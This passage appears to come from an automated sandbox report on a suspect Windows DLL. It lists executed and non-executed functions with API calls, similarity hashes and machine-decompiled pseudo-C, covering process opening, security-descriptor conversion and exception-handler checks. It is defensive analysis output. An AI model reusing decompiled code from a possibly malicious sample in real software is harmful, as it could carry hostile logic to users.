                                                                                                            0x6f03113d
                                                                                                            0x6f031141
                                                                                                            0x6f031147
                                                                                                            0x6f031158
                                                                                                            0x6f031149
                                                                                                            0x6f03114f
                                                                                                            0x6f03114f
                                                                                                            0x6f031147
                                                                                                            0x6f031160
                                                                                                            0x6f031160
                                                                                                            0x6f03116b

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2636182767-0
                                                                                                            • Opcode ID: ff967f22ffc9bdf9fe623924b368602687e887784d7837021c342d6b13d2a60a
                                                                                                            • Instruction ID: b4b7ab2bc0f1b21821c713a1d0dabef79a679a2f8b97b3f5146dd16201a82083
                                                                                                            • Opcode Fuzzy Hash: ff967f22ffc9bdf9fe623924b368602687e887784d7837021c342d6b13d2a60a
                                                                                                            • Instruction Fuzzy Hash: 44119D77D08B17AADB21CBA8CC48F8B77EDBB4A314F010926E441D7190E731E5088B92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09146E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,6F0DA0D4,00000000), ref: 6F0914AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction ID: 102dfec6744d56ac5575113623db97253016d7f2ccc805435d2adfd98f5a0dc4
                                                                                                            • Opcode Fuzzy Hash: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction Fuzzy Hash: B1F0E931789A2456EB119A768804F9F37DDAF4A770B119262EC28DB1C0EB34E801A6E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08F4F7, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 6F08F529
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: bbaae7232eb3889bfced48634e0d62a3086500dbaecdc9438ab595ed358073cf
                                                                                                            • Instruction ID: 7132b3829e5a989e53b794debed5116f57c24e90000e426a7c5c9432533bc356
                                                                                                            • Opcode Fuzzy Hash: bbaae7232eb3889bfced48634e0d62a3086500dbaecdc9438ab595ed358073cf
                                                                                                            • Instruction Fuzzy Hash: DAE0ED712457225AEF111E799C04B8B3BCCAF433F2F0102A1EE34D72C0EB20E90281E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F055C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlEncodePointer.NTDLL(?), ref: 6F055C69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118026453-0
                                                                                                            • Opcode ID: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction ID: 18d34cb1b9aa7f214233c6aead2b22566878d65c0e47463362096e6cac607536
                                                                                                            • Opcode Fuzzy Hash: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction Fuzzy Hash: 26D092B0008E199BDF049F44EC047643FB4F706376F604229E81D83296D7315470EA44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0315A0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E6F0315A0(void* __eax, intOrPtr _a4) {

				 *0x6f0341d0 =  *0x6f0341d0 & 0x00000000;
				_push(0);
				_push(0x6f0341cc);
				_push(1);
				_push(_a4);
				 *0x6f0341c8 = 0xc; // executed
				L6F031764(); // executed
				return __eax;
			}



                                                                                                            0x6f0315a0
                                                                                                            0x6f0315a7
                                                                                                            0x6f0315a9
                                                                                                            0x6f0315ae
                                                                                                            0x6f0315b0
                                                                                                            0x6f0315b4
                                                                                                            0x6f0315be
                                                                                                            0x6f0315c3

                                                                                                            APIs
                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6F0310E6,00000001,6F0341CC,00000000), ref: 6F0315BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: DescriptorSecurity$ConvertString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3907675253-0
                                                                                                            • Opcode ID: e14118ad84b3a3f664fc6c2bcc2be390a7ec9fb972c054b3b63c16eb0b57b9f9
                                                                                                            • Instruction ID: 8c1d3fc437aa4e62067995e86c4230dad9240082d60f97084a0fc6a17116254a
                                                                                                            • Opcode Fuzzy Hash: e14118ad84b3a3f664fc6c2bcc2be390a7ec9fb972c054b3b63c16eb0b57b9f9
                                                                                                            • Instruction Fuzzy Hash: 32C04CBA980F13B6EB309B40CC85F557A61776671DF100604F504291C183F714649519
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 6F09E84C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E8E5
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E90E
                                                                                                            • GetACP.KERNEL32(?,?,6F09EB6A,?,00000000), ref: 6F09E923
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP$jo
                                                                                                            • API String ID: 2299586839-1723675111
                                                                                                            • Opcode ID: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction ID: b9038b26e503fdf3372fd5dba6b1beb4a290d0c80aad08930d05b0c569eee49d
                                                                                                            • Opcode Fuzzy Hash: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction Fuzzy Hash: FC21B322A04205A6E7248BA8C901B8B77F7FF45B64B569525EA1DDB241F732ED40E3B0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F031825, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F031825() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6f0341b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6f0341bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6f0341ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6f0341a8 = _t5;
						 *0x6f0341b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6f0341a4 = _t6;
						if(_t6 == 0) {
							 *0x6f0341a4 =  *0x6f0341a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                                                                            0x6f031826
                                                                                                            0x6f031834
                                                                                                            0x6f03183a
                                                                                                            0x6f031841
                                                                                                            0x6f031898
                                                                                                            0x6f031898
                                                                                                            0x6f031843
                                                                                                            0x6f03184b
                                                                                                            0x6f031858
                                                                                                            0x6f031858
                                                                                                            0x6f031894
                                                                                                            0x6f031896
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f03184d
                                                                                                            0x6f031854
                                                                                                            0x6f03185a
                                                                                                            0x6f03185a
                                                                                                            0x6f03185f
                                                                                                            0x6f03186d
                                                                                                            0x6f031872
                                                                                                            0x6f031878
                                                                                                            0x6f03187e
                                                                                                            0x6f031885
                                                                                                            0x6f031887
                                                                                                            0x6f031887
                                                                                                            0x6f031891
                                                                                                            0x6f031856
                                                                                                            0x6f031856
                                                                                                            0x00000000
                                                                                                            0x6f031856
                                                                                                            0x6f031854

                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6F0315D1), ref: 6F031834
                                                                                                            • GetVersion.KERNEL32 ref: 6F031843
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 6F03185F
                                                                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6F031878
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 845504543-1084903527
                                                                                                            • Opcode ID: 2a8189c008921a7a0d9ae9efde1af3d69e70d9a4a9139238f4533ef82137563f
                                                                                                            • Instruction ID: 5baacd8f0bdbf94f9811717da4eba3db19a145679c2ed3cdace65c050c397667
                                                                                                            • Opcode Fuzzy Hash: 2a8189c008921a7a0d9ae9efde1af3d69e70d9a4a9139238f4533ef82137563f
                                                                                                            • Instruction Fuzzy Hash: F5F03137D49E13AFEF204B685C667953BA1FB0B731F00401AE501CE1C4D7719061AB58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 597776487-0
                                                                                                            • Opcode ID: a64270379c8960435699c4d253d761e3798754f4a2174fde46508d94bf993c15
                                                                                                            • Instruction ID: 02289ff33f40289090c1b58290c6c4d0417d53395070ad23ffbfcf0b338e8d53
                                                                                                            • Opcode Fuzzy Hash: a64270379c8960435699c4d253d761e3798754f4a2174fde46508d94bf993c15
                                                                                                            • Instruction Fuzzy Hash: 81C11371A08209DFDF108F78CC40BAE7BFDAF86364F14656AD5A49B281F731AA41A750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F2FB
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F331
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6F09EB2D
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 6F09EB76
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 6F09EB85
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6F09EBCD
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6F09EBEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 949163717-0
                                                                                                            • Opcode ID: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction ID: f7c5c2cede04a5099c9d5b96f66da20424d4ed8fbe69b65b7d2ef50b0a75e124
                                                                                                            • Opcode Fuzzy Hash: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction Fuzzy Hash: 5F515A71A0060AEAEF00DFA5CC44BAFB7B8BF09305F04556AE925E7191F770A940AB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F076CB3, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6F076DAB
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F076DB5
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6F076DC2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: e86b1dd151493775c40ab80f0acd7ece56b37bc1521915a57987e69307231db1
                                                                                                            • Instruction ID: bf6be8b09490094c11634ec10d09dfcdf8b8b8d3ff60b8287c49efa626de73c7
                                                                                                            • Opcode Fuzzy Hash: e86b1dd151493775c40ab80f0acd7ece56b37bc1521915a57987e69307231db1
                                                                                                            • Instruction Fuzzy Hash: 7131A4B591132C9BCB61DF64D9887DDBBB8AF08314F5041EAE41CA7290EB709F858F54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08C325, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,?,6F08C324,?,000000FF,?,?,?,00000004), ref: 6F08C347
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,6F08C324,?,000000FF,?,?,?,00000004), ref: 6F08C34E
                                                                                                            • ExitProcess.KERNEL32 ref: 6F08C360
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 0af79f3ee5c772d193636ada7d325ac9672c88b9faacb1c58557a4530b992f48
                                                                                                            • Instruction ID: 50653d2b263ec9f35bb73b2c486fb6b7cbe2882fd75b05a1b423958e00d9ffa9
                                                                                                            • Opcode Fuzzy Hash: 0af79f3ee5c772d193636ada7d325ac9672c88b9faacb1c58557a4530b992f48
                                                                                                            • Instruction Fuzzy Hash: 1AE0EC71000A4CAFCF026F64CA58F4D3FB9FF45259F404514F9158A122DB35E992EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F07D630, Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                            • Instruction ID: 8e77da2fdcc7a3872fd9b8529fe90d605efeb32ff1f89ed5e48741b923e9e59e
                                                                                                            • Opcode Fuzzy Hash: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                            • Instruction Fuzzy Hash: 22F11E71E052199BDB24CFA8C99079DF7F2FF89314F1582AAD819AB344DB31A901CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0323D5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F0323D5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6f0341f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6f034240 = 1;
										__eflags =  *0x6f034240;
										if( *0x6f034240 != 0) {
											goto L60;
										}
										_t84 =  *0x6f0341f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6f034240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6f0341f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6f034200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6f0341fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6f034200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6f034200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6f034240 = 1;
							__eflags =  *0x6f034240;
							if( *0x6f034240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6f034200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6f034200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6f034240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6f034200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6f0341f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6f034200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6f034200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                            0x6f0323df
                                                                                                            0x6f0323e2
                                                                                                            0x6f0323e8
                                                                                                            0x6f032406
                                                                                                            0x00000000
                                                                                                            0x6f032406
                                                                                                            0x6f0323f0
                                                                                                            0x6f0323f9
                                                                                                            0x6f0323ff
                                                                                                            0x6f03240e
                                                                                                            0x6f032411
                                                                                                            0x6f032414
                                                                                                            0x6f03241e
                                                                                                            0x6f03241e
                                                                                                            0x6f032420
                                                                                                            0x6f032423
                                                                                                            0x6f032425
                                                                                                            0x6f032425
                                                                                                            0x6f032427
                                                                                                            0x6f03242a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f03242c
                                                                                                            0x6f03242e
                                                                                                            0x6f032494
                                                                                                            0x6f032494
                                                                                                            0x6f0325f2
                                                                                                            0x00000000
                                                                                                            0x6f0325f2
                                                                                                            0x6f032430
                                                                                                            0x6f032430
                                                                                                            0x6f032434
                                                                                                            0x6f032436
                                                                                                            0x6f032436
                                                                                                            0x6f032436
                                                                                                            0x6f032436
                                                                                                            0x6f032439
                                                                                                            0x6f03243a
                                                                                                            0x6f03243d
                                                                                                            0x6f03243d
                                                                                                            0x6f032441
                                                                                                            0x6f032445
                                                                                                            0x6f032453
                                                                                                            0x6f032453
                                                                                                            0x6f03245b
                                                                                                            0x6f032461
                                                                                                            0x6f032463
                                                                                                            0x6f032465
                                                                                                            0x6f032475
                                                                                                            0x6f032482
                                                                                                            0x6f032486
                                                                                                            0x6f03248b
                                                                                                            0x6f03248d
                                                                                                            0x6f03250b
                                                                                                            0x6f03250b
                                                                                                            0x6f03248f
                                                                                                            0x6f03248f
                                                                                                            0x6f03248f
                                                                                                            0x6f03250d
                                                                                                            0x6f03250f
                                                                                                            0x6f0325f0
                                                                                                            0x6f0325f0
                                                                                                            0x00000000
                                                                                                            0x6f032515
                                                                                                            0x6f032515
                                                                                                            0x6f03251c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032522
                                                                                                            0x6f032526
                                                                                                            0x6f032582
                                                                                                            0x6f032584
                                                                                                            0x6f03258c
                                                                                                            0x6f03258e
                                                                                                            0x6f032590
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032592
                                                                                                            0x6f032598
                                                                                                            0x6f03259a
                                                                                                            0x6f03259c
                                                                                                            0x6f0325b1
                                                                                                            0x6f0325b1
                                                                                                            0x6f0325b3
                                                                                                            0x6f0325e2
                                                                                                            0x6f0325e9
                                                                                                            0x00000000
                                                                                                            0x6f0325e9
                                                                                                            0x6f0325b7
                                                                                                            0x6f0325b8
                                                                                                            0x6f0325ba
                                                                                                            0x6f0325bc
                                                                                                            0x6f0325bc
                                                                                                            0x6f0325be
                                                                                                            0x6f0325c0
                                                                                                            0x6f0325c2
                                                                                                            0x6f0325d6
                                                                                                            0x6f0325d6
                                                                                                            0x6f0325d9
                                                                                                            0x6f0325db
                                                                                                            0x6f0325db
                                                                                                            0x6f0325dc
                                                                                                            0x6f0325dc
                                                                                                            0x00000000
                                                                                                            0x6f0325c4
                                                                                                            0x6f0325c4
                                                                                                            0x6f0325c4
                                                                                                            0x6f0325cd
                                                                                                            0x6f0325ce
                                                                                                            0x6f0325d0
                                                                                                            0x6f0325d2
                                                                                                            0x6f0325d2
                                                                                                            0x00000000
                                                                                                            0x6f0325c4
                                                                                                            0x6f0325c2
                                                                                                            0x6f03259e
                                                                                                            0x6f0325a5
                                                                                                            0x6f0325a5
                                                                                                            0x6f0325a7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0325a9
                                                                                                            0x6f0325aa
                                                                                                            0x6f0325ad
                                                                                                            0x6f0325af
                                                                                                            0x00000000
                                                                                                            0x00000000
